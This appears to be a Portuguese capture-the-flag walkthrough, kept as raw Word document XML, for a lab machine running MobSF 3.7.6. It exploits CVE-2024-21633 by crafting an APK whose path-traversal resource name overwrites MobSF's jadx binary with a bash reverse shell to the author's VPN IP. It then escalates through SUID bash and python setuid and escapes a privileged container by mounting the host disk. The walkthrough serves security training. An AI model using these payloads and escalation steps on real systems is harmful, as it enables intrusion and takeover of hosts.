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id06xjcrabty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3t8m4axx4m2o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6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Mob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cahrt67n5qzp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Primeiramente, podemos exportar o IP da máquina como uma variável de ambiente para não termos que ficar escrevendo sempre o IP, assim podemos usar o valor IP nos próximos comandos que utilizamos como parâmetro.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export IP=&lt;IP_MAQUINA&gt;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Iniciamos o CTF realizando um scan das portas da máquina com nmap:</w:t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 -v -T4 -sV -Pn -p- $IP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Identificamos que as portas 22 e 8000 estão abertas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011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331665" cy="5032613"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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1665" cy="50326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57wxk51ld0hn" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 1 - Scan de portas no IP da máquina revela as portas 22 e 8000 abertas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013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a porta 8000 pelo navegador, é possível observar a aplicação MobSF na versão 3.7.6 Beta.</w:t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733800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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jyjnqs62egs3" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 2 - MobSF na versão 3.7.6 Beta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</w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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MobSF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é uma aplicação de análise de segurança em aplicativos mobile. Ao pesquisar vulnreabilidades dessa versão no Google identificamos a</w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">CVE-2024-21633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que permitiria RCE no MobSF usando</w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/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Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">apktool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como visto na Figura 3.</w:t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285780" cy="4565888"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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5780" cy="45658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c2p90p3brwq7" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 3 - Pesquisa de vulnerabilidade no MobSF na versão 3.7.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C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ler como essa vulnerabilidade funciona, vemos que o MobSF usa o apktool para descompilar a aplicação mobile enviada pelo usuário. Durante a descompilação, o apktool utiliza o arquivo resources.arsc (um arquivo vital na composição de um .apk) e deduz o caminho de saída baseado no nome dos recursos. Isso permite um ataque de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">path traversal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consequentemente um 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f3xp7mpt371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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7lo9yejx6rri" w:id="7"/>
      <w:bookmarkEnd w:id="7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realizar a exploração dessa vulnerabilidade será necessário um arquivo .apk qualquer. Podemos pegar um</w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1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hello-world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por exemplo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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3381375" cy="538150"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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5381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8cnc43nfpp8o" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 4 - Arquivo Hello World.apk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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facilitar vamos renomear o arquivo para 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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">app.apk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mv Hello\ World.apk app.apk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Primeiro descompilamos o apk e criamos um recurso raw com o nome </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jadx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a payload maliciosa de reverse shell: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apktool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apk.apk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app/res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mkdir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jadx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Escrevemos nossa payload de reverse shell com a payload apontando para nosso IP da VPN na porta 9001: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#!/bin/bash bash -i &gt;&amp; /dev/tcp/10.0.42.202/9001 0&gt;&amp;1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Salvamos o arquivo jadx.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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2733675" cy="712358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712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nml8o8ji2ptl" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 5 - Arquivo jadx com a payload de reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038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Agora, basta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recompilarmos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 aplicação para gerar o arquivo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">resources.arsc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com a aplicação </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jadx-gui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validamos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que nosso arquivo foi adicionado.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cd ../../../ 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apktool b app -o compiled.apk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jc w:val="center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yyy3owfsyl2s" w:id="10"/>
      <w:bookmarkEnd w:id="10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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3351958" cy="1069159"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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4385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1958" cy="106915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uwkdwvtcmvw1" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 6 - Compilando o novo app com recurso malicioso criado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center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gdne3s9tfqaz" w:id="12"/>
      <w:bookmarkEnd w:id="1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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3771900" cy="2337171"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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26274" l="0" r="4391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3717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vvqfqzic1qly" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 7 - Recurso com a payload visualizada na aplicação compiled.apk, junto com o arquivo resources.arsc (usando o software jadx-gui)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Agora, decompilamos o arquivo “compiled.apk” com o apktool, no intuito de editar o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">resources.arsc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Para isso, vamos usar a aplicação</w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId24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ArscEditor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apktool d compiled.apk -s -r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4286250" cy="1078191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078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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_614h3faey0cy" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 8 - Descompilando “compiled.apk”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048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usar o ArscEditor, basta executar o comando na pasta onde ele foi baixado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java -jar ArscEditor-1.0.2-all.jar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Então, abrimos o arquivo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">resources.arsc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 dentro da pasta </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">compiled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que foi criada no passo anterior. Ao expandir a árvore de arquivos podemos visualizar que o “Value” do recurso malicioso que criamos é </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">res/raw/jadx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280219" cy="3546713"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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0219" cy="35467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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3d0mkw6txj91" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 9 - Valor do recurso malicioso jadx criado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Podemos clicar com o botão direito no ID do recurso e alterar o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para o valor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../../../../../../Mobile-Security-Framework-MobSF/mobsf/StaticAnalyzer/tools/jadx/bin/jadx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10263" cy="3949647"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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394964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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4axzey7182cq" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 10 - Valor do Name alterado para explorar o Path Traversal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Clicamos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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e depois clique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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e sobrescreva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resourses.asrc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para salvar o valor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. Por fim, compilamos novamente esse apk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apktool</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, como visto na Figura 11.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apktool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compiled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poc.apk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Figura 11 - Compilando novamente o aplicativo modificado para o arquivo exploit.apk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Criamos o listener na porta 80 e fazemos o upload do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exploit.apk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para a aplicação MobSF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rlwrap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-nvlp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Ao subir o arquivo, recebemos uma shell no nosso listener, como visto nas Figuras 12 e 13.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:spacing w:after="240" w:before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10025" cy="2043462"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"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10741" l="7258" r="0" t="11099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04346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spacing w:after="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1rb5fzgo1fvg" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 12 - Upload de arquivo malicioso exploit.apk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4505325" cy="925118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925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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mkk8qag16hco" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 13 - Recebendo a conexão reversa no listener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obter a flag de usuário basta navegar até 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/home/mobsf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e ler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user.txt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91936" cy="1845021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1936" cy="1845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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_izfr6gbeb2oz" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 14 - Captura da flag do usuário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ual3k3aqzn69" w:id="20"/>
      <w:bookmarkEnd w:id="20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6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Podemos enumerar binários que possuem a permissão SUID definida. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064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3414713" cy="1562818"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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156281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bh5rfrp6ror" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 15 - Enumeração dos binários com permissão SUID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isso, vemos que o bash tem essa permissão, como mostrado na Figura 16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068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95800" cy="466725"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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667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240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ku0i6iognds4" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 16 - Binário do bash com permissão de SUID, representado pela letra ‘s’ após o -rw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Assim, para escalar os privilégios no container, basta executar </w:t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48250" cy="704850"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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7048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240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uytquowxkzap" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 17 - Explorando permissão SUID do bash para virar root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Porém, ao executar o comando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id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vemos que o uid do usuário ainda está como mobsf, não sendo possível utilizar as funções de root em sua plenitude. Para resolver esse problema, podemos usar o python, fazer o upgrade do terminal e ajustar o uid.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pty;pty.spawn('/bin/bash')"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os;os.setuid(0);os.system('/bin/bash')"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5795963" cy="854834"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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5963" cy="85483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240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fris9dk2hz6w" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 18 - Fazendo upgrade do terminal para full TTY e definindo o uid como 0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possível observar que conseguimos listar os discos e o /dev. Podemos testar se o container está rodando com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--privileged</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, o que nos permitiria montar o disco do host do container, dentro do container.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076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62600" cy="3142149"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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 b="912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14214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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ufp3idk7iow7" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 19 - Listando os arquivos e diretórios do /dev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05225" cy="1025636"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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02563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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a9qss1so1b51" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 20 - Listando os discos da máquina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</w:t>
      </w:r>
      <w:hyperlink r:id="rId37">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0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explorar o container privilegiado</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, podemos montar a pasta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/dev/root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> em uma pasta que nós controlamos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/mnt/pasta</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e montar o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/dev/root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para lá.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mkdir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/mnt/pasta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/dev/root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/mnt/pasta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4838700" cy="986999"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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98699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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_get71a33ivx8" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 21 - Montando o /dev/root na pasta criada no /mnt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isso, conseguimos acessar o disco do host do container e ler a flag de root:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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/mnt/pasta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root.txt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19438" cy="1045172"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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9438" cy="104517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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dsp7ywc6lbh7" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 22 - Pegando a flag de root</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId41" w:type="default"/>
      <w:headerReference r:id="rId42" w:type="first"/>
      <w:headerReference r:id="rId43" w:type="even"/>
      <w:footerReference r:id="rId44" w:type="default"/>
      <w:footerReference r:id="rId45" w:type="first"/>
      <w:footerReference r:id="rId46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</w:t>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                        </w:t>
      <w:tab/>
      <w:t xml:space="preserve">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8">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qnw61nncct6" w:id="29"/>
    <w:bookmarkEnd w:id="29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-866774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20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9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A">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.76pt;height:793.486642040147pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.246028427965058pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2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2" name="image24.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image24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Mob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57975" cy="299234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4204014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jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      <w:i w:val="1"/>
      <w:iCs w:val="1"/>
      <w:sz w:val="20"/>
